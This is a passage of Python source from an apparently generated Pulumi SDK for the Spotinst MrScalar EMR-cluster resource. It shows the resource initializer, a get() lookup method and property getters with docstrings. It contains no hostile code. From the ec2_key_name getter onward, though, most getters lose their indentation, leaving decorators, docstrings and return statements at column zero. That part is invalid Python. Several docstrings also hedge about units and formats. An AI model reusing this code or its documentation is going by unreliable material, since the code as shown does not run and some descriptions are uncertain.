                       task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       task_lifecycle: Optional[pulumi.Input[str]] = None,
                       task_max_size: Optional[pulumi.Input[int]] = None,
                       task_min_size: Optional[pulumi.Input[int]] = None,
                       task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
                       task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
                       task_unit: Optional[pulumi.Input[str]] = None,
                       termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
                       termination_protected: Optional[pulumi.Input[bool]] = None,
                       visible_to_all_users: Optional[pulumi.Input[bool]] = None,
                       __props__=None):
        # Shared initializer backing both __init__ overloads (args-object and
        # keyword form): validates resource options, materializes the input
        # property bag, and registers the resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            # Pin the provider plugin version bundled with this SDK build.
            opts.version = _utilities.get_version()
        if opts.id is None:
            # No id => creating a new resource: build the input bag here.
            # (When an id IS set, the engine performs a lookup and __props__
            # must have been supplied by MrScalar.get instead.)
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            # __new__ bypasses MrScalarArgs.__init__ so no input is required
            # yet; required-ness is enforced explicitly below.
            __props__ = MrScalarArgs.__new__(MrScalarArgs)
            __props__.__dict__["additional_info"] = additional_info
            __props__.__dict__["additional_primary_security_groups"] = additional_primary_security_groups
            __props__.__dict__["additional_replica_security_groups"] = additional_replica_security_groups
            __props__.__dict__["applications"] = applications
            __props__.__dict__["availability_zones"] = availability_zones
            __props__.__dict__["bootstrap_actions_files"] = bootstrap_actions_files
            __props__.__dict__["cluster_id"] = cluster_id
            __props__.__dict__["configurations_files"] = configurations_files
            __props__.__dict__["core_desired_capacity"] = core_desired_capacity
            __props__.__dict__["core_ebs_block_devices"] = core_ebs_block_devices
            __props__.__dict__["core_ebs_optimized"] = core_ebs_optimized
            __props__.__dict__["core_instance_types"] = core_instance_types
            __props__.__dict__["core_lifecycle"] = core_lifecycle
            __props__.__dict__["core_max_size"] = core_max_size
            __props__.__dict__["core_min_size"] = core_min_size
            __props__.__dict__["core_scaling_down_policies"] = core_scaling_down_policies
            __props__.__dict__["core_scaling_up_policies"] = core_scaling_up_policies
            __props__.__dict__["core_unit"] = core_unit
            __props__.__dict__["custom_ami_id"] = custom_ami_id
            __props__.__dict__["description"] = description
            __props__.__dict__["ebs_root_volume_size"] = ebs_root_volume_size
            __props__.__dict__["ec2_key_name"] = ec2_key_name
            __props__.__dict__["expose_cluster_id"] = expose_cluster_id
            __props__.__dict__["instance_weights"] = instance_weights
            __props__.__dict__["job_flow_role"] = job_flow_role
            __props__.__dict__["keep_job_flow_alive"] = keep_job_flow_alive
            __props__.__dict__["log_uri"] = log_uri
            __props__.__dict__["managed_primary_security_group"] = managed_primary_security_group
            __props__.__dict__["managed_replica_security_group"] = managed_replica_security_group
            __props__.__dict__["master_ebs_block_devices"] = master_ebs_block_devices
            __props__.__dict__["master_ebs_optimized"] = master_ebs_optimized
            __props__.__dict__["master_instance_types"] = master_instance_types
            __props__.__dict__["master_lifecycle"] = master_lifecycle
            __props__.__dict__["master_target"] = master_target
            __props__.__dict__["name"] = name
            __props__.__dict__["provisioning_timeout"] = provisioning_timeout
            __props__.__dict__["region"] = region
            __props__.__dict__["release_label"] = release_label
            __props__.__dict__["repo_upgrade_on_boot"] = repo_upgrade_on_boot
            __props__.__dict__["retries"] = retries
            __props__.__dict__["scheduled_tasks"] = scheduled_tasks
            __props__.__dict__["security_config"] = security_config
            __props__.__dict__["service_access_security_group"] = service_access_security_group
            __props__.__dict__["service_role"] = service_role
            __props__.__dict__["steps_files"] = steps_files
            # `strategy` is the only required input; the check is skipped when
            # rehydrating from an existing URN (state already carries it).
            if strategy is None and not opts.urn:
                raise TypeError("Missing required property 'strategy'")
            __props__.__dict__["strategy"] = strategy
            __props__.__dict__["tags"] = tags
            __props__.__dict__["task_desired_capacity"] = task_desired_capacity
            __props__.__dict__["task_ebs_block_devices"] = task_ebs_block_devices
            __props__.__dict__["task_ebs_optimized"] = task_ebs_optimized
            __props__.__dict__["task_instance_types"] = task_instance_types
            __props__.__dict__["task_lifecycle"] = task_lifecycle
            __props__.__dict__["task_max_size"] = task_max_size
            __props__.__dict__["task_min_size"] = task_min_size
            __props__.__dict__["task_scaling_down_policies"] = task_scaling_down_policies
            __props__.__dict__["task_scaling_up_policies"] = task_scaling_up_policies
            __props__.__dict__["task_unit"] = task_unit
            __props__.__dict__["termination_policies"] = termination_policies
            __props__.__dict__["termination_protected"] = termination_protected
            # Deprecated input: still accepted for backward compatibility, but
            # warn the user when it is actually set.
            if visible_to_all_users is not None and not opts.urn:
                warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
                pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
            __props__.__dict__["visible_to_all_users"] = visible_to_all_users
            # Output-only property; the provider fills it in after creation.
            __props__.__dict__["output_cluster_id"] = None
        super(MrScalar, __self__).__init__(
            'spotinst:aws/mrScalar:MrScalar',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            additional_info: Optional[pulumi.Input[str]] = None,
            additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
            availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
            cluster_id: Optional[pulumi.Input[str]] = None,
            configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
            core_desired_capacity: Optional[pulumi.Input[int]] = None,
            core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
            core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
            core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            core_lifecycle: Optional[pulumi.Input[str]] = None,
            core_max_size: Optional[pulumi.Input[int]] = None,
            core_min_size: Optional[pulumi.Input[int]] = None,
            core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
            core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
            core_unit: Optional[pulumi.Input[str]] = None,
            custom_ami_id: Optional[pulumi.Input[str]] = None,
            description: Optional[pulumi.Input[str]] = None,
            ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
            ec2_key_name: Optional[pulumi.Input[str]] = None,
            expose_cluster_id: Optional[pulumi.Input[bool]] = None,
            instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
            job_flow_role: Optional[pulumi.Input[str]] = None,
            keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
            log_uri: Optional[pulumi.Input[str]] = None,
            managed_primary_security_group: Optional[pulumi.Input[str]] = None,
            managed_replica_security_group: Optional[pulumi.Input[str]] = None,
            master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
            master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
            master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            master_lifecycle: Optional[pulumi.Input[str]] = None,
            master_target: Optional[pulumi.Input[int]] = None,
            name: Optional[pulumi.Input[str]] = None,
            output_cluster_id: Optional[pulumi.Input[str]] = None,
            provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
            region: Optional[pulumi.Input[str]] = None,
            release_label: Optional[pulumi.Input[str]] = None,
            repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
            retries: Optional[pulumi.Input[int]] = None,
            scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
            security_config: Optional[pulumi.Input[str]] = None,
            service_access_security_group: Optional[pulumi.Input[str]] = None,
            service_role: Optional[pulumi.Input[str]] = None,
            steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
            strategy: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
            task_desired_capacity: Optional[pulumi.Input[int]] = None,
            task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
            task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
            task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            task_lifecycle: Optional[pulumi.Input[str]] = None,
            task_max_size: Optional[pulumi.Input[int]] = None,
            task_min_size: Optional[pulumi.Input[int]] = None,
            task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
            task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
            task_unit: Optional[pulumi.Input[str]] = None,
            termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
            termination_protected: Optional[pulumi.Input[bool]] = None,
            visible_to_all_users: Optional[pulumi.Input[bool]] = None) -> 'MrScalar':
        """
        Get an existing MrScalar resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
        :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        :param pulumi.Input[str] cluster_id: The MrScaler cluster id.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        :param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
        :param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
        :param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
        :param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
        :param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
        :param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
        :param pulumi.Input[str] description: The MrScaler description.
        :param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
        :param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
        :param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
        :param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
        :param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
        :param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
        :param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
        :param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
        :param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] master_target: Number of instances in the master group.
        :param pulumi.Input[str] name: The application name.
        :param pulumi.Input[str] region: The MrScaler region.
        :param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
        :param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]] scheduled_tasks: An array of scheduled tasks.
        :param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
        :param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
        :param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]] steps_files: Steps from S3.
        :param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]] tags: A list of tags to assign to the resource. You may define multiple tags.
        :param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
        :param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
        :param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
        :param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
        :param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
        :param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
        """
        # Injecting the id into opts forces the lookup (rather than create)
        # path of _internal_init when the MrScalar constructor runs below.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # Build a *state* bag (not an input bag): it reflects last-known
        # provider state, including output-only fields like output_cluster_id.
        __props__ = _MrScalarState.__new__(_MrScalarState)
        __props__.__dict__["additional_info"] = additional_info
        __props__.__dict__["additional_primary_security_groups"] = additional_primary_security_groups
        __props__.__dict__["additional_replica_security_groups"] = additional_replica_security_groups
        __props__.__dict__["applications"] = applications
        __props__.__dict__["availability_zones"] = availability_zones
        __props__.__dict__["bootstrap_actions_files"] = bootstrap_actions_files
        __props__.__dict__["cluster_id"] = cluster_id
        __props__.__dict__["configurations_files"] = configurations_files
        __props__.__dict__["core_desired_capacity"] = core_desired_capacity
        __props__.__dict__["core_ebs_block_devices"] = core_ebs_block_devices
        __props__.__dict__["core_ebs_optimized"] = core_ebs_optimized
        __props__.__dict__["core_instance_types"] = core_instance_types
        __props__.__dict__["core_lifecycle"] = core_lifecycle
        __props__.__dict__["core_max_size"] = core_max_size
        __props__.__dict__["core_min_size"] = core_min_size
        __props__.__dict__["core_scaling_down_policies"] = core_scaling_down_policies
        __props__.__dict__["core_scaling_up_policies"] = core_scaling_up_policies
        __props__.__dict__["core_unit"] = core_unit
        __props__.__dict__["custom_ami_id"] = custom_ami_id
        __props__.__dict__["description"] = description
        __props__.__dict__["ebs_root_volume_size"] = ebs_root_volume_size
        __props__.__dict__["ec2_key_name"] = ec2_key_name
        __props__.__dict__["expose_cluster_id"] = expose_cluster_id
        __props__.__dict__["instance_weights"] = instance_weights
        __props__.__dict__["job_flow_role"] = job_flow_role
        __props__.__dict__["keep_job_flow_alive"] = keep_job_flow_alive
        __props__.__dict__["log_uri"] = log_uri
        __props__.__dict__["managed_primary_security_group"] = managed_primary_security_group
        __props__.__dict__["managed_replica_security_group"] = managed_replica_security_group
        __props__.__dict__["master_ebs_block_devices"] = master_ebs_block_devices
        __props__.__dict__["master_ebs_optimized"] = master_ebs_optimized
        __props__.__dict__["master_instance_types"] = master_instance_types
        __props__.__dict__["master_lifecycle"] = master_lifecycle
        __props__.__dict__["master_target"] = master_target
        __props__.__dict__["name"] = name
        __props__.__dict__["output_cluster_id"] = output_cluster_id
        __props__.__dict__["provisioning_timeout"] = provisioning_timeout
        __props__.__dict__["region"] = region
        __props__.__dict__["release_label"] = release_label
        __props__.__dict__["repo_upgrade_on_boot"] = repo_upgrade_on_boot
        __props__.__dict__["retries"] = retries
        __props__.__dict__["scheduled_tasks"] = scheduled_tasks
        __props__.__dict__["security_config"] = security_config
        __props__.__dict__["service_access_security_group"] = service_access_security_group
        __props__.__dict__["service_role"] = service_role
        __props__.__dict__["steps_files"] = steps_files
        __props__.__dict__["strategy"] = strategy
        __props__.__dict__["tags"] = tags
        __props__.__dict__["task_desired_capacity"] = task_desired_capacity
        __props__.__dict__["task_ebs_block_devices"] = task_ebs_block_devices
        __props__.__dict__["task_ebs_optimized"] = task_ebs_optimized
        __props__.__dict__["task_instance_types"] = task_instance_types
        __props__.__dict__["task_lifecycle"] = task_lifecycle
        __props__.__dict__["task_max_size"] = task_max_size
        __props__.__dict__["task_min_size"] = task_min_size
        __props__.__dict__["task_scaling_down_policies"] = task_scaling_down_policies
        __props__.__dict__["task_scaling_up_policies"] = task_scaling_up_policies
        __props__.__dict__["task_unit"] = task_unit
        __props__.__dict__["termination_policies"] = termination_policies
        __props__.__dict__["termination_protected"] = termination_protected
        # Deprecated field; retained so existing state still round-trips.
        __props__.__dict__["visible_to_all_users"] = visible_to_all_users
        return MrScalar(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="additionalInfo")
    def additional_info(self) -> pulumi.Output[Optional[str]]:
        """
        Meta information about third-party applications that third-party
        vendors use for testing purposes.
        """
        return pulumi.get(self, "additional_info")
    @property
    @pulumi.getter(name="additionalPrimarySecurityGroups")
    def additional_primary_security_groups(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A list of additional Amazon EC2 security group IDs attached to the
        master node.
        """
        return pulumi.get(self, "additional_primary_security_groups")
    @property
    @pulumi.getter(name="additionalReplicaSecurityGroups")
    def additional_replica_security_groups(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A list of additional Amazon EC2 security group IDs attached to the
        core and task nodes.
        """
        return pulumi.get(self, "additional_replica_security_groups")
    @property
    @pulumi.getter
    def applications(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarApplication']]]:
        """
        A case-insensitive list of applications for Amazon EMR to install and
        configure when launching the cluster.
        """
        return pulumi.get(self, "applications")
    @property
    @pulumi.getter(name="availabilityZones")
    def availability_zones(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        List of AZs and their subnet IDs (formatted as `<az>:<subnet-id>`;
        see the usage example in the class docstring).
        """
        return pulumi.get(self, "availability_zones")
    @property
    @pulumi.getter(name="bootstrapActionsFiles")
    def bootstrap_actions_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarBootstrapActionsFile']]]:
        """
        Path to an S3 file containing the description of bootstrap actions.
        [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        """
        return pulumi.get(self, "bootstrap_actions_files")
    @property
    @pulumi.getter(name="clusterId")
    def cluster_id(self) -> pulumi.Output[Optional[str]]:
        """
        The MrScaler cluster ID (the EMR cluster to clone or wrap).
        """
        return pulumi.get(self, "cluster_id")
    @property
    @pulumi.getter(name="configurationsFiles")
    def configurations_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarConfigurationsFile']]]:
        """
        Path to an S3 file containing the description of configurations.
        [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        """
        return pulumi.get(self, "configurations_files")
    @property
    @pulumi.getter(name="coreDesiredCapacity")
    def core_desired_capacity(self) -> pulumi.Output[Optional[int]]:
        """
        The desired number of instances in the core group.
        """
        return pulumi.get(self, "core_desired_capacity")
    @property
    @pulumi.getter(name="coreEbsBlockDevices")
    def core_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreEbsBlockDevice']]]:
        """
        The EBS configuration for core group instances. Only a single block
        is allowed.
        """
        return pulumi.get(self, "core_ebs_block_devices")
    @property
    @pulumi.getter(name="coreEbsOptimized")
    def core_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
        """
        EBS optimization setting for instances in the core group.
        """
        return pulumi.get(self, "core_ebs_optimized")
    @property
    @pulumi.getter(name="coreInstanceTypes")
    def core_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        The MrScaler instance types for the core nodes.
        """
        return pulumi.get(self, "core_instance_types")
    @property
    @pulumi.getter(name="coreLifecycle")
    def core_lifecycle(self) -> pulumi.Output[Optional[str]]:
        """
        The MrScaler lifecycle for instances in the core group. Allowed
        values are 'SPOT' and 'ON_DEMAND'.
        """
        return pulumi.get(self, "core_lifecycle")
    @property
    @pulumi.getter(name="coreMaxSize")
    def core_max_size(self) -> pulumi.Output[Optional[int]]:
        """
        The maximal number of instances in the core group.
        """
        return pulumi.get(self, "core_max_size")
    @property
    @pulumi.getter(name="coreMinSize")
    def core_min_size(self) -> pulumi.Output[Optional[int]]:
        """
        The minimal number of instances in the core group.
        """
        return pulumi.get(self, "core_min_size")
    @property
    @pulumi.getter(name="coreScalingDownPolicies")
    def core_scaling_down_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreScalingDownPolicy']]]:
        """
        Scaling-down policies for the core group (presumably CloudWatch-metric
        driven, mirroring the task scaling policies — confirm with provider docs).
        """
        return pulumi.get(self, "core_scaling_down_policies")
    @property
    @pulumi.getter(name="coreScalingUpPolicies")
    def core_scaling_up_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreScalingUpPolicy']]]:
        """
        Scaling-up policies for the core group (presumably CloudWatch-metric
        driven, mirroring the task scaling policies — confirm with provider docs).
        """
        return pulumi.get(self, "core_scaling_up_policies")
    @property
    @pulumi.getter(name="coreUnit")
    def core_unit(self) -> pulumi.Output[Optional[str]]:
        """
        Unit used for target, min and max sizes. Either `instance` (number of
        instances) or `weight` (amount of vCPU).
        """
        return pulumi.get(self, "core_unit")
    @property
    @pulumi.getter(name="customAmiId")
    def custom_ami_id(self) -> pulumi.Output[Optional[str]]:
        """
        The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a
        custom AMI.
        """
        return pulumi.get(self, "custom_ami_id")
    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        The MrScaler description (free-form text).
        """
        return pulumi.get(self, "description")
    @property
    @pulumi.getter(name="ebsRootVolumeSize")
    def ebs_root_volume_size(self) -> pulumi.Output[Optional[int]]:
        """
        Size of the EBS root device volume (units not documented in this SDK;
        presumably GiB — confirm with the Spotinst/EMR provider docs).
        """
        return pulumi.get(self, "ebs_root_volume_size")
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> pulumi.Output[Optional[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> pulumi.Output[Optional[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarInstanceWeight']]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> pulumi.Output[Optional[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
return pulumi.get(self, "keep_job_flow_alive")
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> pulumi.Output[Optional[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> pulumi.Output[Optional[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> pulumi.Output[Optional[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarMasterEbsBlockDevice']]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> pulumi.Output[Optional[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The application name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="outputClusterId")
def output_cluster_id(self) -> pulumi.Output[str]:
    """
    The cluster id exposed as an output (see `expose_cluster_id`); always present.
    """
    return pulumi.get(self, "output_cluster_id")
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> pulumi.Output[Optional['outputs.MrScalarProvisioningTimeout']]:
    """
    The provisioning-timeout settings block, if configured (see also `retries`).
    """
    return pulumi.get(self, "provisioning_timeout")
@property
@pulumi.getter
def region(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> pulumi.Output[Optional[str]]:
    """
    The EMR release label of the cluster, e.g. an "emr-x.y.z" string — confirm format against provider docs.
    """
    return pulumi.get(self, "release_label")
@property
@pulumi.getter(name="repoUpgradeOnBoot")
